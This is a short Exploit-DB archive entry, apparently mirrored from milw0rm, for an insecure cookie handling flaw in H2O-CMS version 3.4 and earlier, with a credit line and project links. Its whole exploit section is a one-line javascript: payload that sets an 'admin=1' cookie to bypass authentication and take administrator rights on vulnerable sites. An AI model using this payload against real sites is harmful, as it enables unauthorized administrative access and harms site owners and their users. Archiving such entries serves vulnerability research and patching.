exploit-db-mirror/platforms/php/webapps/6862.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

10 lines
381 B
Text
Executable file

# ----------------------------------------------------------
# H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability
# Discovered By Mountassif Moad
# Download On http://sourceforge.net/projects/h2o-cms
# Home World http://v4-team.com
# ----------------------------------------------------------
Exploit:
javascript:document.cookie = "admin=1; path=/";
# milw0rm.com [2008-10-29]